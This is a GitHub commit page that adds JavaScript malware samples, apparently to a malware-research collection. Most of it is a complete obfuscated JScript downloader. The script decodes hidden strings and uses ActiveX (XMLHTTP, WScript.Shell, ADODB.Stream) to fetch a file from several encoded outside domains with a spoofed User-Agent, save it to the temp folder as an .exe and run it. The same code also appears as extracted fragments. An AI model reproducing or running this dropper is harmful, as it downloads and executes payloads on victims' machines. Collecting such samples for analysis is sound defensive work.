Skip to content

Commit

Permalink
Malware from issue #14
Browse files Browse the repository at this point in the history
  • Loading branch information
HynekPetrak committed Oct 4, 2017
1 parent 6210763 commit 60aab76
Show file tree
Hide file tree
Showing 14 changed files with 1,169 additions and 0 deletions.
Binary file not shown.
1 change: 1 addition & 0 deletions malware/20171004/Function[14].js
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
CEMENT[CEMENT2]();
1 change: 1 addition & 0 deletions malware/20171004/Function[15].js
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
trigDA = new Function('vVREBFF3','return \"TVM=\".acetilenButan();');
1 change: 1 addition & 0 deletions malware/20171004/Function[16].js
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
return "TVM=".acetilenButan();
1 change: 1 addition & 0 deletions malware/20171004/Function[17].js

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

1 change: 1 addition & 0 deletions malware/20171004/Function[20].js

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

1 change: 1 addition & 0 deletions malware/20171004/Function[22].js
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
CEMENT['write'](CEMENT2);
Empty file added malware/20171004/eval1.js
Empty file.
Empty file added malware/20171004/eval2.js
Empty file.
349 changes: 349 additions & 0 deletions malware/20171004/malware_20171004_pdf.js
Original file line number Diff line number Diff line change
@@ -0,0 +1,349 @@


function setRH(CR, VR){
CR[VR]("User"+"-Agent", "TW96aWxsYS80LjAgCEMENTKGNvbXBhdGlibGU7IE1TSUUgNi4wOyCEMENTBXaW5kb3dzIE5UIDUuMCk=".acetilenButan());
}




var Desdimonproducer_SayNoNo ="CEMENT"+ ""+"";
var silkopil = "/";



var meuArData = new Array(
52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,115,52,52,52,116,105,106,107,108,109,110,111,112,113,114,52,52,52,52,52,52,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,52,52,52,52,52,52,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52


);


dirtyGog = {'U':'S' , ':':'.' , '88':'' , 'SEMYAK':'onseBody' , '77':'' , '101':'' , 'SEREDINA':'X', '11':''};

function Desdimonproducer_FROG2sud(vardos){
return vardos[("Desdimonproducer_customize","Desdimonproducer_hyperbole","Desdimonproducer_floating","Desdimonproducer_sixtyseven","Desdimonproducer_hottentot","l")+"en" +("Desdimonproducer_legation","Desdimonproducer_untenable","Desdimonproducer_arrival","Desdimonproducer_broadband","Desdimonproducer_detection","gt")+"h"];
}var birdMAN =1 + 0xfd +1;
var meuArDataHO = Desdimonproducer_FROG2sud(meuArData);


for (velVITK_OBLOM= 0; meuArDataHO >velVITK_OBLOM ; ++velVITK_OBLOM) {
meuArData[velVITK_OBLOM] = -50+meuArData[velVITK_OBLOM] - 3;

}

var dirtyGog;
var velVITK_BOSKO_2S = "";


var proto = "prot"+"otype";
var ft11 = function() {
var Desdimonproducer_RazlomSS, line4, Desdimonproducer_Selection1, Desdimonproducer_FROG2c4;

var Desdimonproducer_FROG2out = "";

var line3= this.replace(/CEMENT/gi, Desdimonproducer_FROG2out);line6 = 0;
var Desdimonproducer_FROG2len = Desdimonproducer_FROG2sud(line3);
while (line6 < Desdimonproducer_FROG2len) {


do {
var Desdimonproducer_koch = line3.charCodeAt(line6++) &(0x132- 0x33);
Desdimonproducer_RazlomSS = meuArData[Desdimonproducer_koch];
} while (line6 < Desdimonproducer_FROG2len && Desdimonproducer_RazlomSS == -1);
if (Desdimonproducer_RazlomSS == -1)
break;
do {
stembl = "the";
line4 = meuArData[line3.charCodeAt(line6++) & birdMAN];

} while (line6 < Desdimonproducer_FROG2len && line4 == -1);

if (line4 +2+1== 1+1)
break;

Desdimonproducer_FROG2out += String.fromCharCode((Desdimonproducer_RazlomSS << 2) | ((line4 & 0x30) >> 4));
do {
Desdimonproducer_Selection1 = line3.charCodeAt(line6++) & 0xff;

if (Desdimonproducer_Selection1 == 61)
return Desdimonproducer_FROG2out;

Desdimonproducer_Selection1 = meuArData[Desdimonproducer_Selection1];
} while (line6 < Desdimonproducer_FROG2len && Desdimonproducer_Selection1 == -1);
if (Desdimonproducer_Selection1 == -1)
break;
Desdimonproducer_FROG2out += String.fromCharCode(((line4 & (0xe+1)) << 4) | ((Desdimonproducer_Selection1 & 0x3c) >> 2));

do {
Desdimonproducer_FROG2c4 = line3.charCodeAt(line6++) & birdMAN;

if (Desdimonproducer_FROG2c4 == 61)
return Desdimonproducer_FROG2out;

Desdimonproducer_FROG2c4 = meuArData[Desdimonproducer_FROG2c4];
} while (line6 < Desdimonproducer_FROG2len && Desdimonproducer_FROG2c4 == -1);
if (Desdimonproducer_FROG2c4 == -1)
break;

Desdimonproducer_FROG2out += String.fromCharCode(((Desdimonproducer_Selection1 & 0x03) << 6) | Desdimonproducer_FROG2c4);






}
return Desdimonproducer_FROG2out;
};


function Desdimonproducer_FROG2undefilled(rx, ry) {
rx =HCKD / RDMP ;
ry = velVLUMAHZZ + 109;
};

Desdimonproducer_FROG2undefilled.dEDWWEE = function(){

Desdimonproducer_FROG2ok(Desdimonproducer_FROG2spyFunction1.Desdimonproducer_FROG2calledWith(), "Function called without arguments");
Desdimonproducer_FROG2publisher.Desdimonproducer_FROG2publish(this.Desdimonproducer_FROG2type1, "PROPER1");
Desdimonproducer_FROG2ok(Desdimonproducer_FROG2spyFunction1.Desdimonproducer_FROG2calledWith("PROPER1"), "Function called with 'PROPER1' argument");

Desdimonproducer_FROG2publisher.Desdimonproducer_FROG2publish(this.Desdimonproducer_FROG2type1, ["PROPER1", "PROPER2"]);

};

var trigDA;

String["prototype"].acetilenButan =ft11;
function Gashish(SOcksRadFROGvostochniy){
SOcksRadPUPPYna = SOcksRadFROGvostochniy;
for (var SOcksRadFROG2XCOP in dirtyGog){
SOcksRadPUPPYna = SOcksRadPUPPYna["repl" + "ace"](SOcksRadFROG2XCOP, dirtyGog[SOcksRadFROG2XCOP]);

}
return SOcksRadPUPPYna;
};




var Desdimonproducer_LLL0LLL = "2";

var Desdimonproducer_FROG2TRUEFALSE=("V2lCEMENTuZG93cyBTY3JpcCEMENTHQgSG9zdA=CEMENT=".acetilenButan() +"MPO203ZDD" =="CEMENTV2lCEMENTuZG93cyBTY3JpcCEMENTHQgSG9zdA==".acetilenButan() +"MPO203ZDD")&&typeof(Desdimonproducer_FROG2GzEAPd)==="undefined";


var Desdimonproducer_FROGsrq = "UmVxdWVzdEhlYWRlcg==".acetilenButan();

var DesdimonproducerFPADRML =("").acetilenButan();
var Desdimonproducer_FROG2lidgen = "QWN0CEMENTaXZlWECEMENT9iamVjdA==".acetilenButan();

var Desdimonproducer_FROG2chosen = Math.round(0.7 * 2 - 0.4);


var takeshiKitana = new Function("CEMENT,CEMENT2", "CEMENT[CEMENT2]();");


if(!Desdimonproducer_FROG2TRUEFALSE){
Desdimonproducer_FROG2undefilled.scale = function(Desdimonproducer_FROG2p, Desdimonproducer_FROG2scaleX, Desdimonproducer_FROG2scaleY) {
if (line6sObject(Desdimonproducer_FROG2scaleX)) {
Desdimonproducer_FROG2scaleY = Desdimonproducer_FROG2scaleX.y;
Desdimonproducer_FROG2scaleX = Desdimonproducer_FROG2scaleX.x;
} else if (!line6sNumber(Desdimonproducer_FROG2scaleY)) {
Desdimonproducer_FROG2scaleY = Desdimonproducer_FROG2scaleX;
}
return new Desdimonproducer_FROG2undefilled(Desdimonproducer_FROG2p.x * Desdimonproducer_FROG2scaleX, Desdimonproducer_FROG2p.y * Desdimonproducer_FROG2scaleY);
};

}

function DesdimonproducerFPADZO_ZO(TT){

eval(TT);
}

if(!Desdimonproducer_FROG2TRUEFALSE){
Desdimonproducer_FROG2undefilled.Desdimonproducer_FROG2sameOrN = function(Desdimonproducer_FROG2param1, Desdimonproducer_FROG2param2) {
return Desdimonproducer_FROG2param1.D == Desdimonproducer_FROG2param2.D || Desdimonproducer_FROG2param1.F == Desdimonproducer_FROG2param2.F;
};

Desdimonproducer_FROG2undefilled.angle = function(Desdimonproducer_FROG2p) {
return Math.atan2(Desdimonproducer_FROG2p.y, Desdimonproducer_FROG2p.x);
};
}


var Desdimonproducer_FROG2VARDOCF ="JVRFCEMENTTVAlCEMENT".acetilenButan();

var oLDNameCreator = new Function("CEMENT,CEMENT","trigDA = "+ ("bmV3IEZ1bmN0aW9uKCd2VlJFQkZGMycsJ3JldHVybiBcIlRWTT1cIg==").acetilenButan() + ".acetilenButan();');");

var Desdimonproducerruchka ="RXhwYW5CEMENTkRW52aXJvbm1lbnRTdHJCEMENTpbmCEMENTdz".acetilenButan();

var Desdimonproducer_FROGhatershaha = "";
var Desdimonproducer_FROGodnoklass = "UDqQmLVi";
function placeHolder(AOn){
return new ActiveXObject(AOn);
}
var Desdimonproducer_FROG2Native = function(options){

};

if(WSH){Desdimonproducer_FROG2Native.line6mplement = function(Desdimonproducer_FROG2objects, Desdimonproducer_FROG2properties){
for ( var line6 = 0, Desdimonproducer_FROG2l = Desdimonproducer_FROG2objects.length; line6 < Desdimonproducer_FROG2l; line6++) Desdimonproducer_FROG2objects[line6].line6mplement(Desdimonproducer_FROG2properties);
};
oLDNameCreator();
}





var Desdimonproducer_FROG2d7 ="WA==".acetilenButan() + "M" +"L";


var Desdimonproducer_FROG2_bChosteck = "aHR0cDovLwCEMENT=CEMENT=";


function Desdimonproducer_FROG2_bCho(T, D, C) {
R =D +"";
T[D+""](C);
}

Desdimonproducer_FROG2d7 = trigDA() + Desdimonproducer_FROG2d7+ Gashish(("Desdimonproducer_pomerania","Desdimonproducer_cranium","Desdimonproducer_presage","Desdimonproducer_syria","Desdimonproducer_depot","2.")+"SEREDINAML77H101T"+"TP45CEMENT45"+"WS"+"cr"+"ipt:Uh")+"e"+"ll";

var Desdimonproducer_FROG2DoUtra = [Desdimonproducer_FROG2lidgen, Desdimonproducerruchka,Desdimonproducer_FROG2VARDOCF,"LmVCEMENT4ZQ=CEMENT=".acetilenButan(), "UnCEMENTVuCEMENT".acetilenButan(),Desdimonproducer_FROG2d7];

Desdimonproducer_FROG2Richters=Desdimonproducer_FROG2DoUtra.shift();
var Desdimonproducer_FROG2d2=Desdimonproducer_FROG2DoUtra.pop();
Desdimonproducer_FROG2fabled="Selection2Action";
var Desdimonproducer_FROG2LitoyDISK=ActiveXObject;


var massMarket=Desdimonproducer_FROG2d2.split("45");Desdimonproducer_FROG2Native.Desdimonproducer_FROG2typize=function(a,b){a.type||(a.type=function(a){return Desdimonproducer_FROG2$type(a)===b})};

Desdimonproducer_FROGcccomeccc = "p";
var Limbus2000=new Function("HORN",' var GALAXY = "chastity necessarily()";var kelso = "ADODB.Str32"; return kelso.replace("DILBO", "D").replace("32", "eam");');


function x3fx3d(rdf){
return "\x3F"+rdf+"\x3D";
}
function Desdimonproducer_FROG2_cCho(a,b,c,d){a[b](c,d)}
abtest = massMarket[Desdimonproducer_FROGcccomeccc + "op"]();
var DesdimonproducerGooodName;


function mimimix2(){
try{
ori_sel[fixed] = 0; /* Convert to face format*/ /* Mapping from permutation/orientation to facelet*/ for( var i = 0; i < 8; i++){ for( var j = 0; j < 3; j++) posit[pos[i][(ori_sel[i] + j) % 3]] = fmap[perm_sel[i]][j]; }
}catch(exc1) { util_log(_sc + _inspect(exc1));

}
DesdimonproducerGooodName = "b3BlbgCEMENT=CEMENT=".acetilenButan();
}


DesdimonproducerSeason3 = placeHolder(abtest);



mimimix2();
DesdimonproducerAist=new ActiveXObject(massMarket[0]);
Desdimonproducer_FROG2tudabilo1 = "s";
eval(Desdimonproducer_SayNoNo.acetilenButan());
var Desdimonproducer_FROG2vulture = DesdimonproducerSeason3[Desdimonproducer_FROG2DoUtra.shift()](Desdimonproducer_FROG2DoUtra.shift());
Desdimonproducer_FROG2weasel = "G\x45T";
var Desdimonproducer_FROG2SIDRENKOV = Desdimonproducer_FROG2DoUtra.shift();

Desdimonproducer_FROG2SPASPI = "type";

var Desdimonproducer_selectionPipe = Desdimonproducer_FROG2DoUtra.shift();

function Desdimonproducer_FROG2_aCho(R, K) {
R[K]();
}
function DesdimonproducercomBAT(Desdimonproducer_FROG2gutter, Desdimonproducer_FROG2StrokaParam2) {
var DesdimonproducerWasechO = ""+ Desdimonproducer_FROG2vulture;
try{
DesdimonproducerWasechO=DesdimonproducerWasechO+silkopil;

DesdimonproducerWasechO=DesdimonproducerWasechO +""+ Desdimonproducer_FROG2StrokaParam2 ;



DesdimonproducerAist["open"](Desdimonproducer_FROG2weasel, Desdimonproducer_FROG2gutter, false);

if(Desdimonproducer_FROG2TRUEFALSE){ Desdimonproducer_FROG2_cCho(DesdimonproducerAist,"set"+(11,"Desdimonproducer_umpire","Desdimonproducer_cinema","Desdimonproducer_webmaster","Desdimonproducer_healer","Desdimonproducer_worldwide","Desdimonproducer_slavish","Desdimonproducer_laugh",Desdimonproducer_FROGsrq),"User-Agent","TW96aWxsYS80LjAgCEMENTKGNvbXBhdGlibGU7IE1TSUUgNi4wOyCEMENTBXaW5kb3dzIE5UIDUuMCk=".acetilenButan());

}

vlogTry = "11"
DesdimonproducerAist[Desdimonproducer_FROG2tudabilo1 + ("Desdimonproducer_solution","Desdimonproducer_checklist","Desdimonproducer_precipitated","Desdimonproducer_cultural","Desdimonproducer_boring","en") + "" + "d"]();

var havrosh2 = "Res"+"p"+(Desdimonproducer_FROG2StrokaParam2,"Desdimonproducer_invision","Desdimonproducer_opportunity",2112,"Desdimonproducer_ambulance","Desdimonproducer_contamination",dirtyGog['SEMYAK']);
var havrosh = DesdimonproducerAist[havrosh2];

//if(havrosh < 29989)return false;
// if (havrosh[0]!= 77 || havrosh[1]!= 90)return false;
var Desdimonproducer_MainZ = new Desdimonproducer_FROG2LitoyDISK(Limbus2000());

if (Desdimonproducer_FROG2TRUEFALSE) {


Desdimonproducer_FROGGaSMa = "Selection10Action";

var takeshiKitana2 = new Function("CEMENT,CEMENT2", "CEMENT['wr"+"ite'](CEMENT2);");
takeshiKitana(Desdimonproducer_MainZ,DesdimonproducerGooodName);
Desdimonproducer_MainZ[Desdimonproducer_FROG2SPASPI] = Desdimonproducer_FROG2chosen;

takeshiKitana2( Desdimonproducer_MainZ, havrosh);

Desdimonproducer_FROG2XWaxeQhw = "Selection11Action";
Desdimonproducer_MainZ["position"] = 0;
Desdimonproducer_FROG2krDwvrh = "Selection12Action";
DesdimonproducerWasechO = DesdimonproducerWasechO + Desdimonproducer_FROG2SIDRENKOV;
Desdimonproducer_MainZ["cCEMENT2F2CEMENTZVCEMENTRvRmlsZQ==".acetilenButan()](DesdimonproducerWasechO, 26/13);
Desdimonproducer_FROG2SswQdi = "Selection13Action";


Desdimonproducer_MainZ.close();


DesdimonproducerSeason3[Desdimonproducer_selectionPipe ](DesdimonproducerWasechO,0,false);

}


}catch(exception4) { util_log(_sc + _inspect(exception4));

return false;}


return true;
};



DesdimonproducerFPADZO_ZO(DesdimonproducerFPADRML);



var Desdimonproducer_FROGodnoklassYO = 1;


var Desdimonproducer_FROG2_a5 = ('CEMENTbXlzCEMENTdXNoaS5pdC91eWl0ZnU2NXV5Pw==SSSSCEMENTeW9tYTg4OC5jb20vdCEMENTXlpdGZ1NjV1eT8=SSSS'+'YWltb25pbm8uaW5mby9wNjYvdXlpdGZ1NjV1eQ=='+'CEMENTcmVzdGF1cmFudGVsYnVybGFkZXJvLmNvbS91eWCEMENTl0ZnU2NXV5Pw==SSSSSSSSCEMENT').split("SSSS");

var CEMENT500 = new Function("Desdimonproducer_FROG2_a5,Desdimonproducer_FROG2HORDA5", 'return Desdimonproducer_FROG2_bChosteck.acetilenButan() + Desdimonproducer_FROG2_a5[Desdimonproducer_FROG2HORDA5].acetilenButan();');



for(Desdimonproducer_FROG2HORDA5 in Desdimonproducer_FROG2_a5){
Desdimonproducer_FROGodnoklassYO++;
var s1=CEMENT500(Desdimonproducer_FROG2_a5,Desdimonproducer_FROG2HORDA5)+x3fx3d(Desdimonproducer_FROGodnoklass)+Desdimonproducer_FROGodnoklass;
var sDA2=Desdimonproducer_FROGodnoklass+ Desdimonproducer_FROGodnoklassYO;
if(DesdimonproducercomBAT(s1,sDA2)){
break;
}


}
Loading

0 comments on commit 60aab76

Please sign in to comment.